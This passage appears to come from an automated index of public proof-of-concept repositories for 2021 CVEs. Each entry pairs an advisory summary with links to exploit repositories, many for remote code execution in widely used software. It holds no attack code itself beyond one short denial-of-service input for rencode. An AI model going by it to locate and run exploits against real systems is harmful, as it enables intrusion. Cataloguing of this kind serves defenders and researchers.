openBaraza HCM 3.1.6 does not properly neutralize user-controllable input, which allows reflected cross-site scripting (XSS) on multiple pages: hr/subscription.jsp, hr/application.jsp, and hr/index.jsp (with view= and data=).

- [charlesbickel/CVE-2021-38583](https://github.com/charlesbickel/CVE-2021-38583)

### CVE-2021-38602 (2021-08-12)

PluXML 5.8.7 allows Article Editing stored XSS via Headline or Content.

- [KielVaughn/CVE-2021-38602](https://github.com/KielVaughn/CVE-2021-38602)

### CVE-2021-38603 (2021-08-12)

PluXML 5.8.7 allows core/admin/profil.php stored XSS via the Information field.

- [KielVaughn/CVE-2021-38603](https://github.com/KielVaughn/CVE-2021-38603)

### CVE-2021-38619 (2021-08-13)

openBaraza HCM 3.1.6 does not properly neutralize user-controllable input: an unauthenticated remote attacker can conduct a stored cross-site scripting (XSS) attack against an administrative user from hr/subscription.jsp, hr/application.jsp, and hr/index.jsp (with view=).

- [charlesbickel/CVE-2021-38619](https://github.com/charlesbickel/CVE-2021-38619)

### CVE-2021-38639 (2021-09-15)

Win32k Elevation of Privilege Vulnerability

- [DarkSprings/CVE-2021-38639](https://github.com/DarkSprings/CVE-2021-38639)

### CVE-2021-38647 (2021-09-15)

Open Management Infrastructure Remote Code Execution Vulnerability

- [corelight/CVE-2021-38647](https://github.com/corelight/CVE-2021-38647)
- [midoxnet/CVE-2021-38647](https://github.com/midoxnet/CVE-2021-38647)
- [horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647)
- [Immersive-Labs-Sec/cve-2021-38647](https://github.com/Immersive-Labs-Sec/cve-2021-38647)
- [marcosimioni/omigood](https://github.com/marcosimioni/omigood)
- [craig-m-unsw/omigod-lab](https://github.com/craig-m-unsw/omigod-lab)
- [SimenBai/CVE-2021-38647-POC-and-Demo-environment](https://github.com/SimenBai/CVE-2021-38647-POC-and-Demo-environment)
- [AlteredSecurity/CVE-2021-38647](https://github.com/AlteredSecurity/CVE-2021-38647)
- [abousteif/cve-2021-38647](https://github.com/abousteif/cve-2021-38647)
- [Vulnmachines/OMIGOD_cve-2021-38647](https://github.com/Vulnmachines/OMIGOD_cve-2021-38647)
- [goofsec/omigod](https://github.com/goofsec/omigod)
- [corelight/CVE-2021-38647-noimages](https://github.com/corelight/CVE-2021-38647-noimages)

### CVE-2021-38666 (2021-11-10)

Remote Desktop Client Remote Code Execution Vulnerability

- [DarkSprings/CVE-2021-38666-poc](https://github.com/DarkSprings/CVE-2021-38666-poc)
- [JaneMandy/CVE-2021-38666](https://github.com/JaneMandy/CVE-2021-38666)

### CVE-2021-38699 (2021-08-15)

TastyIgniter 3.0.7 allows XSS via /account, /reservation, /admin/dashboard, and /admin/system_logs.

- [HuskyHacks/CVE-2021-38699-Reflected-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Reflected-XSS)
- [HuskyHacks/CVE-2021-38699-Stored-XSS](https://github.com/HuskyHacks/CVE-2021-38699-Stored-XSS)
- [Justin-1993/CVE-2021-38699](https://github.com/Justin-1993/CVE-2021-38699)

### CVE-2021-38817
- [HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection](https://github.com/HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection)

### CVE-2021-38819 (2022-11-16)

A SQL injection vulnerability exists in the Simple Image Gallery System 1.0 application through the "id" parameter on the album page.

- [m4sk0ff/CVE-2021-38819](https://github.com/m4sk0ff/CVE-2021-38819)

### CVE-2021-39115 (2021-09-01)

Affected versions of Atlassian Jira Service Management Server and Data Center allow remote attackers with "Jira Administrators" access to execute arbitrary Java code or run arbitrary system commands via a Server-Side Template Injection vulnerability in the Email Template feature. The affected versions are before version 4.13.9, and from version 4.14.0 before 4.18.0.

- [PetrusViet/CVE-2021-39115](https://github.com/PetrusViet/CVE-2021-39115)

### CVE-2021-39141 (2021-08-23)

XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purpose.

- [zwjjustdoit/Xstream-1.4.17](https://github.com/zwjjustdoit/Xstream-1.4.17)

### CVE-2021-39165 (2021-08-26)

Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection in `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as the administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active; the stable version 2.3.18 and its development 2.4 branch are affected.

- [W0rty/CVE-2021-39165](https://github.com/W0rty/CVE-2021-39165)
- [manbolq/CVE-2021-39165](https://github.com/manbolq/CVE-2021-39165)

### CVE-2021-39172 (2021-08-27)

Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can exploit a new line injection in the configuration editing feature (e.g. mail settings) and gain arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of newline characters in new configuration values. As a workaround, only allow trusted source IP addresses to access the administration dashboard.

- [W1ngLess/CVE-2021-39172-RCE](https://github.com/W1ngLess/CVE-2021-39172-RCE)

### CVE-2021-39174 (2021-08-27)

Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. As a workaround, only allow trusted source IP addresses to access the administration dashboard.

- [n0kovo/CVE-2021-39174-PoC](https://github.com/n0kovo/CVE-2021-39174-PoC)
- [hadrian3689/cachet_2.4.0-dev](https://github.com/hadrian3689/cachet_2.4.0-dev)

### CVE-2021-39273 (2021-08-19)

In XeroSecurity Sn1per 9.0 (free version), insecure permissions (0777) are set upon application execution, allowing an unprivileged user to modify the application, modules, and configuration files. This leads to arbitrary code execution with root privileges.

- [nikip72/CVE-2021-39273-CVE-2021-39274](https://github.com/nikip72/CVE-2021-39273-CVE-2021-39274)

### CVE-2021-39287
- [Fearless523/CVE-2021-39287-Stored-XSS](https://github.com/Fearless523/CVE-2021-39287-Stored-XSS)

### CVE-2021-39377 (2021-09-01)

A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the index.php username parameter.

- [security-n/CVE-2021-39377](https://github.com/security-n/CVE-2021-39377)

### CVE-2021-39378 (2021-09-01)

A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the NamesList.php str parameter.

- [security-n/CVE-2021-39378](https://github.com/security-n/CVE-2021-39378)

### CVE-2021-39379 (2021-09-01)

A SQL Injection vulnerability exists in openSIS 8.0 when MySQL (MariaDB) is being used as the application database. A malicious attacker can issue SQL commands to the MySQL (MariaDB) database through the ResetUserInfo.php password_stn_id parameter.

- [security-n/CVE-2021-39379](https://github.com/security-n/CVE-2021-39379)

### CVE-2021-39408 (2022-06-24)

A Cross Site Scripting (XSS) vulnerability exists in Online Student Rate System 1.0 via the page parameter on the index.php file.

- [StefanDorresteijn/CVE-2021-39408](https://github.com/StefanDorresteijn/CVE-2021-39408)

### CVE-2021-39409 (2022-06-24)

A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.

- [StefanDorresteijn/CVE-2021-39409](https://github.com/StefanDorresteijn/CVE-2021-39409)

### CVE-2021-39433 (2021-10-04)

A local file inclusion (LFI) vulnerability exists in BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.

- [PinkDraconian/CVE-2021-39433](https://github.com/PinkDraconian/CVE-2021-39433)
- [ibnurusdianto/CVE-2021-39433](https://github.com/ibnurusdianto/CVE-2021-39433)

### CVE-2021-39473 (2022-11-04)

Saibamen HotelManager v1.2 is vulnerable to Cross Site Scripting (XSS) due to improper sanitization of comment and contact fields.

- [BrunoTeixeira1996/CVE-2021-39473](https://github.com/BrunoTeixeira1996/CVE-2021-39473)

### CVE-2021-39475
- [W4RCL0UD/CVE-2021-39475](https://github.com/W4RCL0UD/CVE-2021-39475)

### CVE-2021-39476
- [W4RCL0UD/CVE-2021-39476](https://github.com/W4RCL0UD/CVE-2021-39476)

### CVE-2021-39512
- [guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver](https://github.com/guusec/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver)

### CVE-2021-39623 (2022-01-14)

In doRead of SimpleDecodingSource.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-9. Android ID: A-194105348.

- [bb33bb/CVE-2021-39623](https://github.com/bb33bb/CVE-2021-39623)

### CVE-2021-39670 (2022-05-10)

In setStream of WallpaperManager.java, there is a possible way to cause a permanent DoS due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12, Android-12L. Android ID: A-204087139.

- [Supersonic/Wallbreak](https://github.com/Supersonic/Wallbreak)

### CVE-2021-39685 (2022-03-16)

In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-210292376. References: Upstream kernel.

- [szymonh/inspector-gadget](https://github.com/szymonh/inspector-gadget)

### CVE-2021-39692 (2022-03-16)

In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-209611539.

- [nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692](https://github.com/nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692)

### CVE-2021-39696 (2022-08-09)

In Task.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-185810717.

- [nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696](https://github.com/nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696)

### CVE-2021-39704 (2022-03-16)

In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run a foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-209965481.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-39704](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-39704)

### CVE-2021-39706 (2022-03-16)

In onResume of CredentialStorage.java, there is a possible way to clean up the content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-200164168.

- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706)

### CVE-2021-39749 (2022-03-30)

In WindowManager, there is a possible way to start non-exported and protected activities due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12L. Android ID: A-205996115.

- [michalbednarski/OrganizerTransaction](https://github.com/michalbednarski/OrganizerTransaction)

### CVE-2021-39863 (2021-09-29)

Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

- [lsw29475/CVE-2021-39863](https://github.com/lsw29475/CVE-2021-39863)
- [WHS-SEGFAULT/CVE-2021-39863](https://github.com/WHS-SEGFAULT/CVE-2021-39863)

### CVE-2021-40101 (2021-11-30)

An issue was discovered in Concrete CMS before 8.5.7. The Dashboard allows a user's password to be changed without a prompt for the current password.

- [S1lkys/CVE-2021-40101](https://github.com/S1lkys/CVE-2021-40101)

### CVE-2021-40113 (2021-11-04)

Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: log in with a default credential if the Telnet protocol is enabled, perform command injection, or modify the configuration. For more information about these vulnerabilities, see the Details section of this advisory.

- [karamMahmad/CVE-2021-40113](https://github.com/karamMahmad/CVE-2021-40113)

### CVE-2021-40154 (2021-12-01)

NXP LPC55S69 devices before A3 have a buffer over-read via a crafted wlength value in a GET Descriptor Configuration request during use of USB In-System Programming (ISP) mode. This discloses protected flash memory.

- [Jeromeyoung/CVE-2021-40154](https://github.com/Jeromeyoung/CVE-2021-40154)

### CVE-2021-40222 (2021-09-09)

Rittal CMC PU III Web management (version affected: V3.11.00_2; version fixed: V3.17.10) is affected by a remote code execution vulnerability. It is possible to introduce shell code to create a reverse shell in the PU-Hostname field of the TCP/IP Configuration dialog. The web application fails to sanitize user input on the Network TCP/IP configuration page. This allows the attacker to inject commands as root on the device, which will be executed once the data is received.

- [asang17/CVE-2021-40222](https://github.com/asang17/CVE-2021-40222)

### CVE-2021-40223 (2021-09-09)

Rittal CMC PU III Web management (version V3.11.00_2) fails to sanitize user input on several parameters of the configuration (User Configuration dialog, Task Configuration dialog and set logging filter dialog). This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts). The XSS payload will be triggered when the user accesses some specific sections of the application.

- [asang17/CVE-2021-40223](https://github.com/asang17/CVE-2021-40223)

### CVE-2021-40303 (2022-11-08)

perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile.

- [zecopro/CVE-2021-40303](https://github.com/zecopro/CVE-2021-40303)

### CVE-2021-40345 (2021-10-26)

An issue was discovered in Nagios XI 5.8.5. In the Manage Dashlets section of the Admin panel, an administrator can upload ZIP files. A command injection (within the name of the first file in the archive) allows an attacker to execute system commands.

- [ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345](https://github.com/ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345)

### CVE-2021-40346 (2021-09-08)

An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.

- [knqyf263/CVE-2021-40346](https://github.com/knqyf263/CVE-2021-40346)
- [donky16/CVE-2021-40346-POC](https://github.com/donky16/CVE-2021-40346-POC)
- [alikarimi999/CVE-2021-40346](https://github.com/alikarimi999/CVE-2021-40346)
- [Vulnmachines/HAProxy_CVE-2021-40346](https://github.com/Vulnmachines/HAProxy_CVE-2021-40346)
- [alexOarga/CVE-2021-40346](https://github.com/alexOarga/CVE-2021-40346)

### CVE-2021-40352 (2021-09-01)

OpenEMR 6.0.0 has a pnotes_print.php?noteid= Insecure Direct Object Reference vulnerability via which an attacker can read the messages of all users.

- [allenenosh/CVE-2021-40352](https://github.com/allenenosh/CVE-2021-40352)

### CVE-2021-40353 (2021-09-01)

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the index.php USERNAME parameter. NOTE: this issue may exist because of an incomplete fix for CVE-2020-6637.

- [5qu1n7/CVE-2021-40353](https://github.com/5qu1n7/CVE-2021-40353)

### CVE-2021-40373 (2021-09-10)

playSMS before 1.4.5 allows Arbitrary Code Execution by entering PHP code at the #tabs-information-page of core_main_config, and then executing that code via the index.php?app=main&inc=core_welcome URI.

- [maikroservice/CVE-2021-40373](https://github.com/maikroservice/CVE-2021-40373)

### CVE-2021-40374 (2022-04-06)

A stored cross-site scripting (XSS) vulnerability was identified in Apperta Foundation OpenEyes 3.5.1. Updating a patient's details allows remote attackers to inject arbitrary web script or HTML via the Address1 parameter. This JavaScript then executes when the patient profile is loaded, which could be used in an XSS attack.

- [DCKento/CVE-2021-40374](https://github.com/DCKento/CVE-2021-40374)

### CVE-2021-40375 (2022-04-06)

Apperta Foundation OpenEyes 3.5.1 allows remote attackers to view the sensitive information of patients without having the intended level of privilege. Despite OpenEyes returning a Forbidden error message, the contents of a patient's profile are still returned in the server response. This response can be read in an intercepting proxy or by viewing the page source. Sensitive information returned in responses includes patient PII and medication records or history.

- [DCKento/CVE-2021-40375](https://github.com/DCKento/CVE-2021-40375)

### CVE-2021-40438 (2021-09-16)

A crafted request uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.

- [xiaojiangxl/CVE-2021-40438](https://github.com/xiaojiangxl/CVE-2021-40438)
- [sixpacksecurity/CVE-2021-40438](https://github.com/sixpacksecurity/CVE-2021-40438)
- [BabyTeam1024/CVE-2021-40438](https://github.com/BabyTeam1024/CVE-2021-40438)
- [ericmann/apache-cve-poc](https://github.com/ericmann/apache-cve-poc)
- [pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt)
- [Kashkovsky/CVE-2021-40438](https://github.com/Kashkovsky/CVE-2021-40438)
- [gassara-kys/CVE-2021-40438](https://github.com/gassara-kys/CVE-2021-40438)
- [sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit](https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit)
- [Cappricio-Securities/CVE-2021-40438](https://github.com/Cappricio-Securities/CVE-2021-40438)

### CVE-2021-40444 (2021-09-15)

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

Please see the **Mitigations** and **Workaround** sections for important information about steps you can take to protect your system from this vulnerability.

**UPDATE** September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.

- [ozergoker/CVE-2021-40444](https://github.com/ozergoker/CVE-2021-40444)
- [DarkSprings/CVE-2021-40444](https://github.com/DarkSprings/CVE-2021-40444)
- [rfcxv/CVE-2021-40444-POC](https://github.com/rfcxv/CVE-2021-40444-POC)
- [bambooqj/CVE-2021-40444_EXP_JS](https://github.com/bambooqj/CVE-2021-40444_EXP_JS)
- [Immersive-Labs-Sec/cve-2021-40444-analysis](https://github.com/Immersive-Labs-Sec/cve-2021-40444-analysis)
- [vysecurity/CVE-2021-40444](https://github.com/vysecurity/CVE-2021-40444)
- [k4k4/CVE-2021-40444-Sample](https://github.com/k4k4/CVE-2021-40444-Sample)
- [lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444)
- [fengjixuchui/CVE-2021-40444-docx-Generate](https://github.com/fengjixuchui/CVE-2021-40444-docx-Generate)
- [KnoooW/CVE-2021-40444-docx-Generate](https://github.com/KnoooW/CVE-2021-40444-docx-Generate)
- [mansk1es/Caboom](https://github.com/mansk1es/Caboom)
- [jamesrep/cve-2021-40444](https://github.com/jamesrep/cve-2021-40444)
- [W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx](https://github.com/W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx)
- [aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders)
- [khoaduynu/CVE-2021-40444](https://github.com/khoaduynu/CVE-2021-40444)
- [Jeromeyoung/MSHTMHell](https://github.com/Jeromeyoung/MSHTMHell)
- [k8gege/CVE-2021-40444](https://github.com/k8gege/CVE-2021-40444)
- [klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444)
- [Phuong39/CVE-2021-40444-CAB](https://github.com/Phuong39/CVE-2021-40444-CAB)
- [Edubr2020/CVE-2021-40444--CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless)
- [kal1gh0st/CVE-2021-40444_CAB_archives](https://github.com/kal1gh0st/CVE-2021-40444_CAB_archives)
- [LazarusReborn/Docx-Exploit-2021](https://github.com/LazarusReborn/Docx-Exploit-2021)
- [H0j3n/CVE-2021-40444](https://github.com/H0j3n/CVE-2021-40444)
- [metehangenel/MSHTML-CVE-2021-40444](https://github.com/metehangenel/MSHTML-CVE-2021-40444)
- [Jeromeyoung/TIC4301_Project](https://github.com/Jeromeyoung/TIC4301_Project)
- [tiagob0b/CVE-2021-40444](https://github.com/tiagob0b/CVE-2021-40444)
- [kagura-maru/CVE-2021-40444-POC](https://github.com/kagura-maru/CVE-2021-40444-POC)
- [Zeop-CyberSec/word_mshtml](https://github.com/Zeop-CyberSec/word_mshtml)
- [Alexcot25051999/CVE-2021-40444](https://github.com/Alexcot25051999/CVE-2021-40444)
- [lisinan988/CVE-2021-40444-exp](https://github.com/lisinan988/CVE-2021-40444-exp)
- [34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit](https://github.com/34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit)
- [MRacumen/CVE-2021-40444](https://github.com/MRacumen/CVE-2021-40444)
- [RedLeavesChilde/CVE-2021-40444](https://github.com/RedLeavesChilde/CVE-2021-40444)
- [nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-](https://github.com/nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-)
- [hqdat809/CVE-2021-40444](https://github.com/hqdat809/CVE-2021-40444)
- [basim-ahmad/Follina-CVE-and-CVE-2021-40444](https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444)

### CVE-2021-40449 (2021-10-13)

Win32k Elevation of Privilege Vulnerability

- [ly4k/CallbackHell](https://github.com/ly4k/CallbackHell)
- [KaLendsi/CVE-2021-40449-Exploit](https://github.com/KaLendsi/CVE-2021-40449-Exploit)
- [hakivvi/CVE-2021-40449](https://github.com/hakivvi/CVE-2021-40449)
- [Kristal-g/CVE-2021-40449_poc](https://github.com/Kristal-g/CVE-2021-40449_poc)
- [CppXL/cve-2021-40449-poc](https://github.com/CppXL/cve-2021-40449-poc)
- [BL0odz/CVE-2021-40449-NtGdiResetDC-UAF](https://github.com/BL0odz/CVE-2021-40449-NtGdiResetDC-UAF)
- [SamuelTulach/voidmap](https://github.com/SamuelTulach/voidmap)
- [toanthang1842002/CVE-2021-40449](https://github.com/toanthang1842002/CVE-2021-40449)

### CVE-2021-40492 (2021-09-03)

A reflected XSS vulnerability exists in multiple pages in version 22 of the Gibbon application that allows for arbitrary execution of JavaScript (gibbonCourseClassID, gibbonPersonID, subpage, currentDate, or allStudents to index.php).

- [5qu1n7/CVE-2021-40492](https://github.com/5qu1n7/CVE-2021-40492)

### CVE-2021-40512
- [war4uthor/CVE-2021-40512](https://github.com/war4uthor/CVE-2021-40512)

### CVE-2021-40513
- [war4uthor/CVE-2021-40513](https://github.com/war4uthor/CVE-2021-40513)

### CVE-2021-40514
- [war4uthor/CVE-2021-40514](https://github.com/war4uthor/CVE-2021-40514)

### CVE-2021-40531 (2021-09-06)

Sketch before 75 allows library feeds to be used to bypass file quarantine. Files are automatically downloaded and opened, without the com.apple.quarantine extended attribute. This results in remote code execution, as demonstrated by CommandString in a terminal profile to Terminal.app.

- [jonpalmisc/CVE-2021-40531](https://github.com/jonpalmisc/CVE-2021-40531)

### CVE-2021-40539 (2021-09-07)

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

- [DarkSprings/CVE-2021-40539](https://github.com/DarkSprings/CVE-2021-40539)
- [synacktiv/CVE-2021-40539](https://github.com/synacktiv/CVE-2021-40539)
- [lpyzds/CVE-2021-40539](https://github.com/lpyzds/CVE-2021-40539)
- [lpyydxs/CVE-2021-40539](https://github.com/lpyydxs/CVE-2021-40539)
- [Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539](https://github.com/Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539)

### CVE-2021-40822 (2022-05-01)

GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.

- [phor3nsic/CVE-2021-40822](https://github.com/phor3nsic/CVE-2021-40822)

### CVE-2021-40839 (2021-09-10)

The rencode package through 1.0.6 for Python allows an infinite loop in typecode decoding (such as via ;\x2f\x7f), enabling a remote attack that consumes CPU and memory.

- [itlabbet/CVE-2021-40839](https://github.com/itlabbet/CVE-2021-40839)

### CVE-2021-40845 (2021-09-15)

The web part of Zenitel AlphaCom XE Audio Server through 11.2.3.10, called AlphaWeb XE, does not restrict file upload in the Custom Scripts section at php/index.php. Neither the content nor extension of the uploaded files is checked, allowing execution of PHP code under the /cmd directory.

- [ricardojoserf/CVE-2021-40845](https://github.com/ricardojoserf/CVE-2021-40845)

### CVE-2021-40859 (2021-12-07)

Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices that give attackers with access to the web-based management application full administrative access to the device.

- [419066074/CVE-2021-40859](https://github.com/419066074/CVE-2021-40859)
- [0xr001/CVE-2021-40859](https://github.com/0xr001/CVE-2021-40859)
- [pussycat0x/CVE-2021-40859](https://github.com/pussycat0x/CVE-2021-40859)

### CVE-2021-40865 (2021-10-25)

An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4.

- [hktalent/CVE-2021-40865](https://github.com/hktalent/CVE-2021-40865)

### CVE-2021-40870 (2021-09-13)

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

- [System00-Security/CVE-2021-40870](https://github.com/System00-Security/CVE-2021-40870)
- [0xAgun/CVE-2021-40870](https://github.com/0xAgun/CVE-2021-40870)
- [orangmuda/CVE-2021-40870](https://github.com/orangmuda/CVE-2021-40870)
- [JoyGhoshs/CVE-2021-40870](https://github.com/JoyGhoshs/CVE-2021-40870)

### CVE-2021-40875 (2021-09-22)

Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.

- [SakuraSamuraii/derailed](https://github.com/SakuraSamuraii/derailed)
- [Lul/TestRail-files.md5-IAC-scanner](https://github.com/Lul/TestRail-files.md5-IAC-scanner)

### CVE-2021-40903 (2022-06-17)

A vulnerability in Antminer Monitor 0.50.0 exists because of a backdoor or misconfiguration inside a settings file in the Flask server. The settings file has a predefined secret string which is meant to be randomly generated, but is static.

- [vulnz/CVE-2021-40903](https://github.com/vulnz/CVE-2021-40903)

### CVE-2021-40904 (2022-03-25)

The web management console of CheckMK Raw Edition (versions 1.5.0 to 1.6.0) allows a misconfiguration of the web app Dokuwiki (installed by default) that permits embedded PHP code. As a result, remote code execution is achieved. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session of a user with the administrator role.

- [Edgarloyola/CVE-2021-40904](https://github.com/Edgarloyola/CVE-2021-40904)

### CVE-2021-40905 (2022-03-25)

The web management console of CheckMK Enterprise Edition (versions 1.5.0 to 2.0.0p9) does not properly sanitise the uploading of ".mkp" files, which are Extension Packages, making remote code execution possible. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session of a user with the administrator role. NOTE: the vendor states that this is the intended behavior: admins are supposed to be able to execute code in this manner.

- [Edgarloyola/CVE-2021-40905](https://github.com/Edgarloyola/CVE-2021-40905)

### CVE-2021-40906 (2022-03-25)

CheckMK Raw Edition software (versions 1.5.0 to 1.6.0) does not sanitise the input of a web service parameter that is in an unauthenticated zone. This reflected XSS allows an attacker to open a backdoor on the device with HTML content that is interpreted by the browser (such as JavaScript or other client-side scripts), or to steal the session cookies of a previously authenticated user via a man in the middle. Successful exploitation requires access to the web service resource without authentication.

- [Edgarloyola/CVE-2021-40906](https://github.com/Edgarloyola/CVE-2021-40906)

### CVE-2021-40978 (2021-10-07)

The mkdocs 1.2.2 built-in dev-server allows directory traversal on port 8000, enabling remote exploitation to obtain sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601 and https://github.com/nisdn/CVE-2021-40978/issues/1

- [nisdn/CVE-2021-40978](https://github.com/nisdn/CVE-2021-40978)

### CVE-2021-41073 (2021-09-19)

